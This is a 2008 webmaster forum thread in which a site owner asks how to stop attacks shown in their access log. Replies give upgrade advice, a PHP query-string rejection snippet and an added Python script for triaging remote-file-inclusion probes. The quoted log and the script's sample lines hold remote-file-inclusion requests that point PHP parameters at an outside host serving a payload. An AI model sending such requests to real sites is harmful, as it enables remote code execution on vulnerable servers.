This morning I have discovered someone has tried to exploit my site. The information is below. My index.php file contains a Flash file which has a form, the PHP for which is in a separate file named 'feedback.php'.
Basically I want to stop these exploits and I wonder how I can do it? I have asked on a few forums but nothing is working! It seems I need to somehow restrict access or redirect bad requests. Please help, I can't afford to be blacklisted for this.
Many Thanks
209.3.11.x - - [20/May/2008:01:14:38 +0200] "GET /admin/business_inc/saveserver.php? thisdir=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:01:14:38 +0200] "GET /dotproject/includes/db_adodb.php? baseDir=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:01:14:39 +0200] "GET /interact/modules/forum/embedforum.php? CONFIG[LANGUAGE_CPATH]=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:01:14:40 +0200] "GET /saveserver.php? thisdir=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:01:14:41 +0200] "GET /index.php? page=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 200 4008
209.3.11.x - - [20/May/2008:01:14:41 +0200] "GET /index.php? x=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 200 4008
65.36.241.x - - [20/May/2008:02:02:09 +0200] "HEAD / HTTP/1.1" 200 0
81.80.12.x - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983
209.3.11.x - - [20/May/2008:02:22:02 +0200] "GET /mambo/index.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:02:22:02 +0200] "GET /index.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 200 4008
209.3.11.x - - [20/May/2008:02:22:03 +0200] "GET /index2.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:02:22:03 +0200] "GET /mambo/index2.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
65.36.241.x - - [20/May/2008:03:03:55 +0200] "HEAD / HTTP/1.1" 200 0
209.3.11.x - - [20/May/2008:03:13:48 +0200] "GET /phplive/help.php? css_path=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
209.3.11.x - - [20/May/2008:03:13:49 +0200] "GET /webcalendar/tools/send_reminders.php? includedir=http://82.127.69.x/dotProject/files/1.gif? / HTTP/1.1" 404 1631
[edited by: jatar_k at 9:11 pm (utc) on May 20, 2008]
[edit reason] no specific ips thanks [/edit]
Welcome to WebmasterWorld. Are you running an old version of Mambo? It's going to be hard for anyone here to debug the problem from the code you posted. I would recommend you upgrade your system to the latest version of Joomla (originally Mambo) or try another CMS.
CMS are renowned for having security issues.
dc
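<?php
// Reject any request that carries a query string (only for pages that never need one).
// trim() also covers an "empty" query string that arrives as a single space.
if ( isset( $_SERVER["QUERY_STRING"] ) && trim( $_SERVER["QUERY_STRING"] ) !== '' )
{
    unset( $_SERVER["QUERY_STRING"] );
    header( "HTTP/1.0 400 Bad Request" );
    exit;
}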
I found that the "empty" $_SERVER["QUERY_STRING"] is actually a space.
Hope this helps!
Are these just attempts at hacking your scripts or are you certain they are working? If your applications are as secure as possible and correctly written then there is little else you can do. As stated above, you can redirect if a query string is present if you don't need any, or you can ban the IPs that are attacking you, the latter of which I would do anyway.
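Added example, not written by any poster in this thread: a log triage script for the question of whether the probes are only attempts. It flags requests in which a parameter value is itself a remote URL and separates scripts that do not exist (404) from scripts that answered and so need their include()/require() calls reviewed. The function names, the `SAMPLE` lines and the addresses in them are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>.+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)
# A parameter value that is itself a remote URL marks a remote-file-inclusion probe.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def rfi_probe(line):
    """Return details of a remote-file-inclusion probe, or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # The log excerpt in the thread has spaces after '?' and '&'; drop them.
    path, _, query = m.group('target').replace(' ', '').partition('?')
    params = []
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if REMOTE_RE.match(unquote(value)):   # also catches http%3A%2F%2F...
            params.append(name)
    if not params:
        return None
    return {'host': m.group('host'), 'path': path, 'params': params,
            'status': int(m.group('status')), 'size': m.group('size')}

def triage(lines):
    """Split probes into scripts that do not exist (404) and scripts that do."""
    report = {'missing': [], 'review': []}
    for line in lines:
        hit = rfi_probe(line)
        if hit:
            # Any status other than 404 means a real script received the
            # parameter, so check how that script uses the named parameter.
            report['missing' if hit['status'] == 404 else 'review'].append(hit)
    return report

# Constructed sample lines in the thread's log format (documentation addresses).
SAMPLE = [
    '192.0.2.10 - - [20/May/2008:01:14:38 +0200] "GET /saveserver.php? thisdir=http://198.51.100.7/files/1.gif? / HTTP/1.1" 404 1631',
    '192.0.2.10 - - [20/May/2008:01:14:41 +0200] "GET /index.php?page=http://198.51.100.7/files/1.gif? HTTP/1.1" 200 4008',
    '192.0.2.10 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/files/1.gif? HTTP/1.1" 200 4008',
    '203.0.113.5 - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983',
    '203.0.113.5 - - [20/May/2008:02:20:00 +0200] "GET /index.php?page=contact HTTP/1.1" 200 3983',
]

if __name__ == '__main__':
    for hit in triage(SAMPLE)['review']:
        print(hit['path'], hit['params'], hit['status'], hit['size'])
```

A 200 on a flagged line only shows that the script exists and answered; whether the parameter ever reaches an include()/require() has to be read from the script itself.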